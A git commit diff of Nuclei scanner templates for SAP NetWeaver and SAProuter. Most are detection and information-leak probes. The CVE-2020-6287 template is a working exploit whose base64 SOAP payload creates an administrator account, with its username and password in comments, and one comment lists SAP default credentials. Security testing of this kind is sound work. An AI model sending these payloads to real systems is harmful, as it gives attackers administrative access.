commit
0013f94807
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-6287
|
||||
|
||||
info:
|
||||
name: Create an Administrative User in SAP NetWeaver AS JAVA (LM Configuration Wizard)
|
||||
name: SAP NetWeaver - Remote Admin addition
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
tags: cve,cve2020,sap
|
||||
|
@ -11,24 +11,32 @@ info:
|
|||
- https://launchpad.support.sap.com/#/notes/2934135
|
||||
- https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675
|
||||
- https://www.onapsis.com/recon-sap-cyber-security-vulnerability
|
||||
- https://github.com/chipik/SAP_RECON
|
||||
|
||||
requests:
|
||||
- payloads:
|
||||
data: helpers/payloads/CVE-2020-6287.xml
|
||||
raw:
|
||||
- raw:
|
||||
- |
|
||||
POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: text/xml; charset=UTF-8
|
||||
Connection: close
|
||||
|
||||
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>{{base64('§data§')}}</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
|
||||
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>
|
||||
CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA==
|
||||
</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
|
||||
|
||||
# userName - sapRpoc6351
|
||||
# password - Secure!PwD8890
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "urn:CTCWebServiceSi"
|
||||
- "CTCWebServiceSi"
|
||||
- "SOAP-ENV"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
@ -36,4 +44,5 @@ requests:
|
|||
- type: word
|
||||
words:
|
||||
- "text/xml"
|
||||
part: header
|
||||
- "SAP NetWeaver Application Server"
|
||||
part: header
|
||||
|
|
|
@ -1,10 +1,10 @@
|
|||
id: sap-netweaver-portal-detect
|
||||
id: sap-netweaver-portal
|
||||
|
||||
info:
|
||||
name: SAP NetWeaver Portal detect
|
||||
name: SAP NetWeaver Portal
|
||||
author: organiccrap
|
||||
severity: info
|
||||
tags: panel
|
||||
tags: panel,sap
|
||||
|
||||
# SAP Netweaver default creds - SAP*/06071992 or TMSADM/$1Pawd2&
|
||||
|
|
@ -1,36 +0,0 @@
|
|||
id: sap-recon-detect
|
||||
|
||||
info:
|
||||
name: SAP RECON Finder
|
||||
author: samueladi_ & organiccrap
|
||||
severity: medium
|
||||
tags: panel
|
||||
|
||||
# Source:- https://github.com/chipik/SAP_RECON
|
||||
# This is detection template, please use above poc to exploit this further.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/CTCWebService/CTCWebServiceBean"
|
||||
- "{{BaseURL}}/CTCWebService/CTCWebServiceBean?wsdl"
|
||||
- "{{BaseURL}}/CTCWebService/Config1?wsdl"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- Method Not Allowed
|
||||
- Expected request method POST. Found GET.
|
||||
- Generated by WSDLDefinitionsParser
|
||||
- bns0:Config1Binding
|
||||
- wsdl:definitions
|
||||
- tns:CTCWebServiceSiBinding
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 405
|
||||
- 200
|
||||
condition: or
|
|
@ -1 +0,0 @@
|
|||
<root><user><JavaOrABAP>java</JavaOrABAP><username>projectdiscover</username><password>proj3ctD1$c0v3ry</password><userType></userType></user></root>
|
|
@ -0,0 +1,25 @@
|
|||
id: sap-netweaver-info-leak
|
||||
|
||||
info:
|
||||
name: SAP NetWeaver ICM Info page leak
|
||||
author: randomstr1ng
|
||||
description: Detection of SAP NetWeaver ABAP Webserver /public/info page
|
||||
severity: medium
|
||||
tags: sap,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/sap/public/info"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "RFC_SYSTEM_INFO.Response"
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "<RFCDEST>.*</RFCDEST>"
|
|
@ -0,0 +1,24 @@
|
|||
id: sap-router-info-leak
|
||||
|
||||
info:
|
||||
name: SAPRouter - Routing information leak
|
||||
author: randomstr1ng
|
||||
severity: critical
|
||||
tags: network,sap
|
||||
|
||||
network:
|
||||
- inputs:
|
||||
- data: 00000022524f555445525f41444d002802000000000000000000000000000000000000000000
|
||||
type: hex
|
||||
|
||||
host:
|
||||
- "{{Hostname}}"
|
||||
- "{{Hostname}}:3299"
|
||||
read-size: 2048
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Routtab"
|
||||
- "Working directory"
|
||||
- "SAProuter Connection Table"
|
|
@ -0,0 +1,22 @@
|
|||
id: sap-router
|
||||
|
||||
info:
|
||||
name: SAPRouter Detection
|
||||
author: randomstr1ng
|
||||
severity: info
|
||||
tags: network,sap
|
||||
|
||||
network:
|
||||
- inputs:
|
||||
- data: 57484f415245594f553f0a
|
||||
type: hex
|
||||
|
||||
host:
|
||||
- "{{Hostname}}"
|
||||
- "{{Hostname}}:3299"
|
||||
read-size: 1024
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "SAProuter"
|
|
@ -1,20 +0,0 @@
|
|||
id: sap-netweaver-as-java-detect
|
||||
|
||||
info:
|
||||
name: SAP NetWeaver AS JAVA (LM Configuration Wizard) Detection
|
||||
author: dwisiswant0
|
||||
severity: info
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/CTCWebService/CTCWebServiceBean?wsdl"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "urn:CTCWebServiceSi"
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,13 +1,30 @@
|
|||
id: sap-netweaver-detect
|
||||
|
||||
info:
|
||||
name: SAP NetWeaver Detect
|
||||
author: rakeshmane10
|
||||
name: SAP NetWeaver ICM Detection
|
||||
author: randomstr1ng
|
||||
description: Detection of SAP NetWeaver ABAP Webserver (ICM/ICF)
|
||||
severity: info
|
||||
tags: sap,webserver
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/irj/portal'
|
||||
- "{{BaseURL}}"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- NetWeaver
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- "sap-server:"
|
||||
- "Sap-Server:"
|
||||
- "SAP NetWeaver Application Server"
|
||||
condition: or
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
part: header
|
||||
kval:
|
||||
- "server"
|
||||
|
|
|
@ -0,0 +1,23 @@
|
|||
id: sap-nw-webgui
|
||||
|
||||
info:
|
||||
name: SAP NetWeaver WebGUI Detection
|
||||
author: randomstr1ng
|
||||
description: Detection of SAP NetWeaver ABAP Webserver WebGUI
|
||||
severity: info
|
||||
tags: sap,webserver
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/sap/bc/gui/sap/its/webgui"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "sap-system-login"
|
||||
- "<title>Logon</title>"
|
||||
condition: or
|
|
@ -6,10 +6,18 @@ info:
|
|||
description: A simple workflow that runs all SAP NetWaver related nuclei templates on a given target.
|
||||
tags: workflow
|
||||
|
||||
# Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0)
|
||||
# Old workflows still remains valid, and will be working with all nuclei versions.
|
||||
|
||||
workflows:
|
||||
- template: technologies/sap-netweaver-as-java-detect.yaml
|
||||
- template: technologies/sap-netweaver-detect.yaml # HTTP Templates
|
||||
subtemplates:
|
||||
- template: cves/2020/CVE-2020-6287.yaml
|
||||
- template: cves/2017/CVE-2017-12637.yaml
|
||||
- template: cves/2020/CVE-2020-6308.yaml
|
||||
- template: exposed-panels/fiorilaunchpad-logon.yaml
|
||||
- template: exposed-panels/hmc-hybris-panel.yaml
|
||||
- template: exposed-panels/sap-netweaver-portal.yaml
|
||||
- template: exposed-panels/sap-hana-xsengine-panel.yaml
|
||||
- template: misconfiguration/sap/
|
||||
|
||||
- template: network/sap-router.yaml # Network Templates
|
||||
subtemplates:
|
||||
- template: network/sap-router-info-leak.yaml
|
||||
|
|
Loading…
Reference in New Issue